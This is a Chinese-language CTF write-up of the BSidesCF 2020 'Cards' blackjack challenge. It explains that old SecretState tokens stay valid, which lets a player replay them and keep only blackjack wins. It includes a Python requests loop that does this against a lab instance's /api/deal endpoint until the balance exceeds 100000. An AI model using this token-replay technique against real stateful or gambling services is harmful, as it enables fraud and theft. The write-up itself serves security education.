[BSidesCF 2020]Cards

image-20241119152319230

1
发现大量字符,用{}包括的是json数据“”:“”

image-20241119152437375

我们在每次请求都会有一个SecretState参数,用来保存游戏状态,并且在客户端和服务端同步。这个参数没法篡改。每次请求,服务端都会生成一个新的SecretState,但是旧的SecretState并不失效,问题就出在于此。
游戏如果赢了,就更新SecretState,如果输了,则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。
但是有个问题,下注之后要开牌的话,必须得用新的SecretState,而下注的时候分数已经扣了,这样输的状态依然存在。
这就需要利用21点里一个规则,如果先发的2张牌已经是21点(black jack),则直接赢(直接1.5倍)。这种状态下可以省去开牌那一步。
首先在这个url下面获取一个secret,因为后面在出牌的时候需要使用
(旧SecretState还有效带来的问题,再加上21点特殊的规则,发牌在特定情况下可以直接赢)

直接在每次dea时提交A+10的SecretState就行了

python脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#secret='6dcf49949620f7d43497fe0971b059e8a3fa599b4d8b4493072fcf8aca667d0da69365f3ec9aa0ca520001dc65f731b5faacb84d3af689bd405a7594f44eaddff55bf568678d098ade861b65f83419b71716c102b08beadc37e05cdfc7cebd9cca47426b3ec8199bc08c04645243e2c38e4f86e758d112a950b2924bbbd01535841db11c7e2ee38f916284ca2d689d27c6c05d71d561d727010775290b07078cb24bb5d247af49a963df723806d97bb0fe9db886355866976ff65e2bc2d3ac10405e181723d20865f9ab3763dfdab13f5597022b970d7cd1f627886efe517e4e603e3b9a9d75a4d3caddeacbad24683157bcb169d02758059187aac0a4f8347a16760ce25d3813129fe13d95bb1bc994dc56aadf3de983bac4c84da0ae959382eb4ddbf74320eb970fb601232d1b7b9b0db6780c19273e14ad6da0a210607d8acda0af308be2454942929a48862a9e4bec5a66d0793e4f7303e807d1f151216948d5b527bad3f5599d83fb6a67e082996d382eb1ca8681b2db2a61288fe2b0609b212cba182719ecf55f53bc6dd4f763fa89a6a6db9255beee51dd1901d95233726c98eaa2611752f394f6312e34dcd8c2b11be916dc03ec0f6339da4a37864304ad715a00ccf8252ed54ac82245dddb34e5f3b31a9103ea5789cd66cc37b88fec2afc2e2bafce0eb22ed81abba8c4a10451fb49e2c9dc193dd2aeefd0cb4257844c4a6e231ff495c05686c841e11f1ba3392151c907c330a2a9c88002693b06482de03c68ed5257bdd51b683c93111068fff57d4de157981cb3189831c4a8b022b84544a377ce0f157e1d7453d795d6698e785ea69001890949807e6fa97f26540617c9f43b5d687c4848226da7d57f17a35b0b68f2362371a2c1b213641dd3ca10f4a096644e3f2afbf8679bcbf437a154f3881eaeb2c0b546746740d88b57430f2965eb39d6a17892468d48796652cb4f66425d12236d262ef21b3e04164682220b1c7e86464795c1765f665754a4d0073563492854e3d7b7aa5d2f5dfc5d3cba7ef8ad992e97712d2ec9053da948919cc25812857a769541f9cde5e374520bd0237058f250f2f2bd49b79fc8b8492a6f927b6db4e9ef7de14a4cb2bf03e608fad99ef76fe54f8b204d478f7d78b707b5d48f1dbd15eb5f5a623a3c45ffc7d673d40c916b162047bf6e9b08f3ec41086b09b0dad4489d565b56dea64c83ffb2d698580567f4af25fdb027ad00e7ad214589b87fd6ede106eaeb188a9c0431cbafcf567f3831df8ca0df6ab97602b0261acdaa3815523d0c719c204ebdf9e63edf7bd356b883e9aa22cca9e221b7cdd5f2fcb45c4b8d1904e7d1f30238b440a8ddb8788b104a583e26ea5224d7170cc0ac5d8258e15a52052d6f000180b0d847aabbf66561f9856fea706eb526d6938d038eb45f1dd10ccf90c1e3aabed756cf1bf7469a836008af0b391e61558f5a961dc1a488511047adadda4a93519387b4f19fc2ccfa7ca79bafce508d0da40bab1055b47b104f49e0e1cc41a3790cc8ae06f71f8c2058434a4670e38d99160815af9704f7c90f43329bb5a73db512d2f6d2edbef386e71ef13423c8be41baa568059d7bfdc4e210a84d7503b1f6a7884d0aff42928f8f8c673338b2b09f2dc62d856530ff87814d68289ae07f85f655262f51aae96e427d892a1920d77163ebbbbf3758fce7d44c2d4f7c2c223f84ee9463291c987f814ff0f880f5b8a98d790079271ba82cc962def32286a6a7b72b68c089ea2ed542812204bb10a9915ffe9853c3a618ef524ae905b1'
#json数据--------
# {"SecretState":"1c5e9c5b10f834d4be72062c24408ff21f8a97263d472f0ed7cd55265ca2098be59a00c15513407acdf420d61303716eed1bd276d903daa479d4bdf1565b838d13862b03d62eae2f2fc36f2b55ae50219071ddd4ce5ef58978a3461869c4eaad361534f7d3de410d9455cd9562958a5253b2cc2c2378a1adf45eeaf680c2e147b5a663d60b59d0c1b3de99d87bc8b1e9c9db3b43eaa4e942caf3c2bf2b789099fda1d345e095df6e8c7e1add44786da4a7f6fcbcaa3fad8f95497c1133c395f95905e1f83b8ffa6052cd5dbdb9ef026da6cb6cced8f15dd15fd46b8494ee3b736b595b88a00188ad202d35f6d17b834ec79e899f769d8e0ee8b318271b887c1db19254e20dfdf55abea753865a914b9cdd9d6499587b04299c1965e0a3f4d58699f6e731717c54647ab3a21baf6cc7bfa566a3bf88a437ba9b58c6affba9e8f8d11581418cf8dbe4b41a1712dc55965f960744ebad61b1f5cc7fdcbd19aec0d64e234d5e66c3f96c3c71c4ff6f1f6130499a78b7f74fd45a917e643449945f469a020c2126bc44547b110c1f016a18945e741e1f168f5ea63f01dd8c42ea361d5374893410ed515f393e57778c5429cd4012016eb2ac7c91b88a1295ec7cab5b3506c3897e860d222c1927fcc85c94dd63d3e0d712810b8dee2086ee986a27e829c12cccd4a26417404a91e423c0839f8e96596fcc40ab75e5fb039cf964da22e16e22e52d41f9397728639142b768da1e7719d99a58268a61fbc8794bd52c9e80aabeb6fdaa1786b2468a5a25825b2992e4acb37728226982b1604f325a534796f95aecb80e5a30c6fc90c88a24fb0538ea1fed62cc5c191aa8592af57fd1617e465f3f8fc4913eeb05d1810ec49c7118761ea4b74d27cf7dcd4f7b88c14cc9fcda15148430f789ad974a3ea5049f3a7b5b47fbd73db2903b8e3179a7cb3988703b84aa9ac174d54189be2a6041baef88ff7f0a04d3a1a94cf685da1cdeaffbf31db37bfbe7b7f5f455e66423d36d2a55560a8ed2b32fa171e68596be3f19e30b9174d62a104d84607a7b9b54d879830968c73aa61b56b6ac9bcdf083270dfef8b261b07cf57fc9542c9fd70afa32870685b8bae85f0d58e8ad18bd6e320796e40643857d6e4b044656231efb80106e4850e3a9bad72a9e61bb11f01dbb7f492244c974bd92323f2171987955ed051183c37da90e4eb7f72e2f36e2a045877cd2097db6d4a56c269df2983736f4323f43f80bb0b8d7325675a8b4c237a96b22ba3c8b93830f01388530668a59e258eec7e628a665d2c5598e5325efeab5e8c8be9901702f28340c0de3245f26d43b9ecc68d2486e2c78b03fec0110f1ffbe14d057481f8b15af0becba884af906bc56ad1db5ca2b37072eb75fbec79182255eb2bb9c04d4dae6f8a116987e9b0b10565c9a17a764503a16c3b7a6c577029f5c8bea506ed407f20ffc373e13d147c1c5f19498b81b055797bb3fe0985b9defab811d9b3333bc991ac747ce7f1b61c6ff87901fe77915bc051d2ec15532e3899535d546444c2e97422dc9b61d096ebe91a510dc0a7e8485e28b15e42addadf8db0e666fc812dd3495d79312cd949802b1273877b652fefd329df451bd980c05b120a81d582f3ccf5ce10e6eaa755c75ae8f7023feb35b02ec5ab0e594da5a4618a5e930868e080d733ff7","PlayerHand":[],"DealerHand":[],"Balance":1000,"GameState":"Idle","SessionState":"Playing","Bet":0}
#-----------------
import requests

start = "http://a459185f-ff4c-4d00-8013-34498ee7de73.node5.buuoj.cn:81/api"
deal = start + "/deal"


# 开局
state = requests.post(start).json()["SecretState"]

while True:
    # 下注
    try:
        resp = requests.post(deal, json={"Bet": 500, "SecretState": state}).json()
    except:
        continue

    if resp['GameState'] == 'Blackjack':
        state = resp['SecretState']

    print(resp['Balance'])
    if resp['Balance'] > 100000:
        print(resp)
        break

(这个题目在于json数据的提交,之前都没见过~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)

参考链接:https://blog.csdn.net/solitudi/article/details/109186061